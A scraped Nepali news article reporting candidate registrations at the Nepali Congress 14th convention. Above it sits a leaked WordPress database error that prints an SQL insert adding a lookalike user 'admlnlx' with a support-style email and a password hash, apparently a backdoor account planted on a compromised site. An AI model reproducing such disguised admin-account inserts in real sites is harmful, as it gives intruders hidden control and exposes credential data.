WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BsIMIt/wbsBfF48PMFh4/kGaN8Kglk1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-29 21:58:35', '', 'admlnlx', 'admlnlx')

कांग्रेस महाधिवेशनः महामन्त्रीमा मीनेन्द्र, विश्वप्रकाश र गगनको उम्मेदवारी – Gaule Khabar

कांग्रेस महाधिवेशनः महामन्त्रीमा मीनेन्द्र, विश्वप्रकाश र गगनको उम्मेदवारी

कांग्रेस महाधिवेशनः महामन्त्रीमा मीनेन्द्र, विश्वप्रकाश र गगनको उम्मेदवारी

काठमाण्डौ । नेपाली कांग्रेसको १४औँ महाधिवेशनअन्तर्गत महामन्त्री पदका लागि नेपाली कांग्रेसका नेताहरु डा मीनेन्द्र रिजाल, गगन थापा र विश्वप्रकाश शर्माले उम्मेदवारी दर्ता गराएको छ ।

महाधिवेशनअन्तर्गत नयाँ कार्यसमिति चयनका लागि उम्मेदवारी मनोनयन प्रक्रिया भृकुटीमण्डप र राष्ट्रिय सभागृहमा जारी छ ।

यसअघि आजै सभापति पदका लागि प्रकाशमान सिंह, कल्याण गुरुङ र युवराज न्यौपानेले मनोनयन दर्ता गराएको थियो । उपसभापतिमा नेता महेश आचार्य र सुजाता कोइरालाले मनोनयन दर्ता गराएको छ ।

यसैगरी सहमहामन्त्रीमा मानबहादुर विश्वकर्मा, बद्रीप्रसाद पाण्डे, फर्मुल्लाह मनसुर, सुरेन्द्र चौधरी र देवराज चालिसेले उम्मेदवारी दर्ता गराउनुभएको केन्द्रीय निर्वाचन समितिले जनाएको छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका